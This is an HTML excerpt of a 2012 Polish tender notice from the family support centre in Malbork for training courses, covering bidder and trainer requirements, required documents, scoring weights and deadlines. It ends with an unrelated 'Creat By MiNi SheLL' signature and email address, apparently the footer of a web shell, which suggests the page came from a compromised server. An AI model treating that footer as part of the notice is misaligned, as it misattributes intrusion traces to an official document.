<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował jednym trenerem, który  zostanie oddelegowany do pełnienia funkcji trenera na szkoleniu/kursie będącym przedmiotem niniejszego przetargu przy czym osoba ta musi posiadać odpowiednie wykształcenie, kwalifikacje i  uprawnienia do prowadzenia danego szkolenia/kursu oraz doświadczenie zdobyte w ciągu ostatnich trzech lat przed upływem terminu składania ofert w pełnieniu funkcji wykładowcy na co najmniej trzech szkoleniach o tematyce określonej dla wybranego kursu wymienionego paragrafie 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie wykonawcy - 20</li>
<li>3 - Doświadczenie trenera - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.powiat.malbork.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pcpr.powiat.malbork.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2012 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Malborku, ul. Plac Słowiański 17, 82-200 Malbork, pok. nr 10 (sekretariat), parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 2.Kursy/szkolenia obejmują 22 osoby w tym: 20 osób niepełnosprawnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com